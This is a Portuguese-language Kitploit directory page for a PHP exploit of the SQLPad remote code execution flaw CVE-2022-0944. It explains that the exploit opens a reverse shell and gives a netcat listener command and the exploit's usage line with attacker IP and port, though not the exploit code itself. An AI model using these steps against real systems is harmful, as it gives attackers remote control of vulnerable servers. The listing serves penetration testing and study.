Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 Exploit de Execução Remota de Código | Kitploit
Ferramentas/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 Exploit de Execução Remota de Código

Ver Repositório
13há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Como Funciona:

Este código PHP foi concebido para explorar uma vulnerabilidade de Execução Remota de Código (RCE) no SQLPad, relacionada ao CVE-2022-0944.
Ele funciona ao injetar código malicioso no aplicativo SQLPad, forçando-o a executar um comando do sistema que abre um shell reverso – uma conexão que concede ao atacante o controle remoto do sistema vulnerável.


Pré-requisitos:

  • PHP CLI – sudo apt-get install php-cli
  • cURL (biblioteca PHP cURL) – sudo apt-get install php-curl

Uso:

1. Configure o Listener (na Máquina do Atacante)

Para capturar a conexão do shell reverso, inicie o Netcat na máquina do atacante:

root@kitploit:~
nc -lvnp 4444

Execute o Exploit

root@kitploit:~
php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: A URL raiz do SQLPad vulnerável (ex.: http://target.com:3000)

<attacker_ip>: O endereço IP do atacante que está ouvindo a conexão reversa (mesmo IP do Netcat)

<attacker_port>: A porta na qual o atacante está ouvindo (mesma porta do Netcat)

Referências

A lógica original do exploit foi baseada neste repositório:

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

Meu objetivo aqui foi entender a lógica do exploit e reescrevê-la em outra linguagem de programação como um desafio pessoal.

Referência adicional: 🔗 CVE-2022-0944 – NVD

Baixar ferramenta